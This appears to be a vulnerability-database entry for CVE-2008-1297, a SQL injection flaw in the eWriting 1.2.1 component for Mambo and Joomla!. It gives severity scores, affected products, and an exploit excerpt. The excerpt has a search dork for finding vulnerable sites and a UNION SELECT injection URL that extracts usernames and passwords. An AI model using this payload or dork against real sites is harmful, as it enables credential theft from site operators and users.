7.5
CVSSv2

CVE-2008-1297

Published: 12/03/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in the eWriting (com_ewriting) 1.2.1 module for Mambo and Joomla! allows remote malicious users to execute arbitrary SQL commands via the cat parameter in a selectcat action.

Vulnerable Product Search on Vulmon Subscribe to Product

joomla com ewriting 1.2.1

mambo com ewriting 1.2.1

ewriting ewriting 1.2.1

Exploits

eWriting 121 - SQL injection # Discovered by breaker_unit & Don # BHack # b4lc4norg # Gretz to h4cky0uorg l r00tsecurityorg l h4cky0ubiz l Dorks: "Powered by eWriting 121 allinurl:"com_ewriting" Joomla! /indexphp?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password) ...